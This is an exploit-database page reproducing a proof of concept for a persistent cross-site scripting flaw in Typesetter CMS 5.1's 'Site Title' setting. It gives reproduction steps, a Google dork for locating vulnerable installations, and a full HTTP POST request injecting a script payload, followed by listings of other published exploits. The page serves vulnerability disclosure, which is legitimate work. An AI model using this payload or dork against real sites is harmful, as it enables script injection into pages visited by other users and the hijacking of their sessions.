To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting"

Author

Exploit author

"Alperen Ergel"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title: Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting
# Exploit Author: Alperen Ergel
# Web Site: https://alperenae.gitbook.io/
# Contact: @alperen_ae (IG) @alpren_ae (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: windows 10 / xammp
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE :-
######## Description ########
#
# 1-) Loggin administrator page
#  
# 2-) Edit under Settings > Configration >  General Settings > title and add payload
#
# 3-) Back to web site then will be work payload
#
#
######## Proof of Concept ########

========>>> REQUEST <<<=========

POST /typesetter/Admin/Configuration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/typesetter/Admin/Configuration

Content-Type: application/x-www-form-urlencoded

Content-Length: 1134
Connection: close
Cookie: g=2; gpEasy_bf7bf352c176=zM0WimE3PVwK7QeQaaK88BgSGnOYXfD7d5y7K815; __gads=ID=6078ee5aea85c9aa:T=1600515511:S=ALNI_MaaxxD3-kKm1mS0BDTLxQUBoD-1bw; _ga=GA1.2.862675868.1600515711; __atuvc=3%7C38%2C1%7C39%2C3%7C40; wires_challenge=afzBq%2FHPKhRGhabSML1Jc738JzKxfr4w; _gid=GA1.2.50322462.1601402080

Upgrade-Insecure-Requests: 1

verified=1fe7b252b3aa6f0a3ef412e4d9556f34bce5d15f0433057805e74c41305a2cab2641a4ec81988341275dab33e5f92e8ebd3cf70766f8b9718f835d1e4f5ec78d
&title=%3Cscript%3Ealert%28%22THIS+IS+XSS+PAYLOAD%22%29%3B%3C%2Fscript%3E&keywords=&desc=&aaa=Save+%28All%29&colorbox_style=example1&gallery_legacy_style=false&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true
&showgplink=false&showgplink=true&maximgarea=2073600&resize_images=false&resize_images=true&preserve_icc_profiles=false&preserve_icc_profiles=true&preserve_image_metadata=false&preserve_image_metadata=true&maxthumbsize=300&maxthumbheight=&thumbskeepaspect=false&auto_redir=90&history_limit=30&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&space_char=-&toemail=cms%40gfdk.org&toname=dsadasda&from_address=AutomatedSender%40localhost&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-01 "TypeSetter 5.1 - CSRF (Change admin e-mail)" webapps php "Alperen Ergel"
2020-10-19 "Textpattern CMS 4.6.2 - Cross-site Request Forgery" webapps php "Alperen Ergel"
2020-10-07 "Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting" webapps php "Alperen Ergel"
2020-10-01 "Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting" webapps php "Alperen Ergel"
2020-09-22 "Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting" webapps php "Alperen Ergel"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48852/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.